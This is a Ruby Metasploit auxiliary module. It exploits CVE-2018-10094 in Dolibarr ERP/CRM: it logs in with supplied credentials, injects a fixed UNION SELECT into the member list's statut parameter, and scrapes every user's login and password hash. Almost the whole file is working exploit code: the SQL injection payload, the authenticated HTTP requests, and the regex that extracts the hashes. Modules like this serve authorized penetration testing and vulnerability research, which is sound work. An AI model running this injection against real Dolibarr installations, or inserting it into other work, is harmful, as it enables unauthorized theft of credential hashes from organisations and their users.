Path: blob/master/modules/auxiliary/gather/dolibarr_creds_sqli.rb
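##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Authenticated post-auth credential gathering against Dolibarr ERP/CRM
# (CVE-2018-10094). The member list's `statut` parameter is injectable; the
# module logs in with operator-supplied credentials, injects a fixed UNION
# SELECT over llx_user and scrapes login / pass_crypted pairs from the HTML.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  # Fixed injection payload. It is fully hex-encoded before being placed in the
  # query string; no part of it comes from a remote or untrusted source.
  INJECTION = "1) union select 0,1,login,pass_crypted,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from llx_user #".freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Dolibarr Gather Credentials via SQL Injection',
        'Description' => %q{
          This module enables an authenticated user to collect the usernames and
          encrypted passwords of other users in the Dolibarr ERP/CRM via SQL
          injection.
        },
        'Author' => [
          'Issam Rabhi', # PoC
          'Kevin Locati', # PoC
          'Shelby Pace', # Metasploit Module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2018-10094' ],
          [ 'EDB', '44805']
        ],
        'DisclosureDate' => '2018-05-30',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [ true, 'The base path to Dolibarr', '/' ]),
        OptString.new('USERNAME', [ true, 'The username for authenticating to Dolibarr', 'admin' ]),
        OptString.new('PASSWORD', [ true, 'The password for authenticating to Dolibarr', 'admin' ])
      ]
    )
  end

  # Base path of the Dolibarr install, with a trailing 'index.php' removed so
  # that sub-paths can be appended. Returns a fresh string: the original code
  # appended to target_uri.path in place with '<<=', which corrupted TARGETURI
  # for every later request in the same module instance.
  def base_path
    path = target_uri.path.to_s
    path.end_with?('index.php') ? path.sub(/index\.php\z/, '') : path
  end

  # URI of the login page: TARGETURI itself when it already names index.php,
  # otherwise index.php directly beneath it.
  def login_uri
    normalize_uri(base_path, 'index.php')
  end

  # Fetches the login page. Returns the response when it looks like Dolibarr
  # (body mentions 'Dolibarr'), false otherwise. The response is returned rather
  # than a boolean because its cookies seed the login step.
  def check_availability
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => login_uri
    )

    return false unless res && res.body.include?('Dolibarr')

    res
  end

  # Authenticates with USERNAME/PASSWORD using the cookies from +response+.
  # Returns the cookie string to use for subsequent requests; fails the module
  # (Failure::NoAccess) when the post-login page lacks the members menu marker.
  def login(response)
    return false unless response

    cookies = response.get_cookies
    print_status('Logging in...')

    login_res = send_request_cgi(
      'method' => 'POST',
      'uri' => login_uri,
      'cookie' => cookies,
      'vars_post' => {
        'username' => datastore['USERNAME'],
        'password' => datastore['PASSWORD'],
        'loginfunction' => 'loginfunction'
      }
    )

    unless login_res && login_res.body.include?('id="mainmenua_members"')
      fail_with(Failure::NoAccess, "Couldn't log into Dolibarr")
    end

    print_good('Successfully logged into Dolibarr')
    # NOTE(review): the pre-login cookies are reused for the injected request.
    # If a target rotates its session cookie on login, login_res.get_cookies
    # would need to be merged in here — confirm against a live instance.
    cookies
  end

  # Sends the injected member-list request and hands the HTML to
  # format_results. Fails with Failure::NotFound when the list page is not
  # reachable (typically a user without member-module permissions).
  def get_info(cookies)
    # String-building the URL is acceptable here: the payload is a constant,
    # 'hex-all' encodes every byte, and TARGETURI is operator-controlled.
    payload = Rex::Text.uri_encode(INJECTION, 'hex-all')
    inject_uri = "#{normalize_uri(base_path, 'adherents', 'list.php')}?leftmenu=members&statut=#{payload}"

    inject_res = send_request_cgi(
      'method' => 'GET',
      'uri' => inject_uri,
      'cookie' => cookies
    )

    unless inject_res && inject_res.body.include?('id="searchFormList"')
      fail_with(Failure::NotFound, 'Failed to access page. The user may not have permissions.')
    end

    print_good('Accessed credentials')
    format_results(inject_res.body)
  end

  # Scrapes (hash, login) pairs out of the injected list page and records them.
  # Capture order follows how the original stored them: first group is the
  # pass_crypted value, second group the login name.
  def format_results(output)
    credentials = output.scan(/valignmiddle">0<\/div><\/a><\/td>.<td>([a-zA-Z0-9]*)<\/td>.<td>(\S*)<\/td>/m)

    fail_with(Failure::NotFound, 'No credentials found') if credentials.empty?

    credentials.each do |pass_hash, login|
      print_good("#{login} #{pass_hash}")
      # pass_crypted is a stored hash, not a cleartext password (the module
      # description itself calls it 'encrypted'). Recording it with the default
      # private_type of :password would let credential reuse treat it as a
      # replayable secret, so tag it as a non-replayable hash.
      store_valid_credential(user: login, private: pass_hash, private_type: :nonreplayable_hash)
    end
  end

  # Entry point: reachability check, login, then the injected query.
  def run
    available_res = check_availability
    fail_with(Failure::NotFound, 'Could not access the Dolibarr webpage') unless available_res

    cookies = login(available_res)
    fail_with(Failure::NoAccess, 'Could not log in. Verify credentials') unless cookies

    get_info(cookies)
  end
end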